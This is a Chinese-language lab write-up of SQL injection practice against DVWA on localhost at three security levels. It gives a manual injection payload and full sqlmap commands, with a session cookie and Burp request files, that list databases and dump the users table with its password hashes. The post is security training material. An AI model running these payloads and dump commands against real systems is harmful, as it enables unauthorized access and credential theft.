【DVWA】SQL注入

此处注入灵魂:practice makes perfect~

LOW就完了

*手动注入

1.猛猛判别过程:

1’ and ‘1’='1
判断闭合显示
根据order by判断一下有几列
order by一下
正确判别有两列的回显
order by
union判断位置
union所有的表
在结果中找可疑的信息:
就是你了
查到名字为dvwa的可以库名,以及其中的名为users的可疑表。
查找可疑列
完美结局
最后通过md5一转密文得出结果。

*sqlmap注入

思路依旧:库-表-列–用户密码

sqlmap -u “http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=b265u8q8sm3udictrkh1u1cdbj; security=low” --dbs -batch

  • cookie的作用是保持客户端与服务器的状态,用于验证是否来自同一服务器。所以此处需要登录的访问应该携带指定当前cookie做身份验证。
    –dbs 获取数据库信息
    -batch 批处理?maybe
    代码结果

对可疑库名dvwa进行检测
sqlmap -u “http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=b265u8q8sm3udictrkh1u1cdbj; security=low” -D dvwa --tables --batch

查询到dvwa库内的两个表guestbook和users

对可疑表名users go on to detect
sqlmap -u “http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=b265u8q8sm3udictrkh1u1cdbj; security=low” -D dvwa -T users --dump --batch
–dump指令用来导出对应表内的数据

过于完美了
okk了 skr

Mid就完了

*sqlmap注入

针对post方法的提交,sqlmap使用burpsuite获取request信息>txt格式

sqlmap -r request.txt --dbs
sqlmap -r request.txt -D dvwa --tables
sqlmap -r request.txt -D dvwa -T users --dump --batch

过于完美
同样获取
okk了
okk了

High就完了

*sqlmap注入

这里本打算延续mid中使用burp对request头加上referer关键词进行进行检测,但不知道为什么失败了。
high比上边多了一个重定向部分:
Referer: http://127.0.0.1/DVWA/vulnerabilities/sqli/
sqlmap -r high.txt --referer “http://127.0.0.1/DVWA/vulnerabilities/sqli/” -p referer --level 3 --dbs
应该是我把这里像难了。…

方法一: 所以这里知难而退的学人精本人决定使用–second-url的方法来
此部分参考自仙女的实验步骤:DVWA练习——sql注入

sqlmap -u “http://127.0.0.1/DVWA/vulnerabilities/sqli/session-input.php” --data=“id=1&Submit=Submit” --second-url=“http://127.0.0.1/DVWA/vulnerabilities/sqli/” --cookie=“PHPSESSID=b265u8q8sm3udictrkh1u1cdbj;security=high” --dbs -batch

okk
-u的url是提交页面
–second-url是显示页面

*改错:知道为什么啦,因为burp一开始抓到的是click页面的包,但应该抓的是提交页面的包用来检测。
补充方法二:
right
正确的包应该是提交数据后的
之后>high.txt

sqlmap -r high.txt --dbs

简便且完美
改错的启发来源于方法一中的两个url区别的理解~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值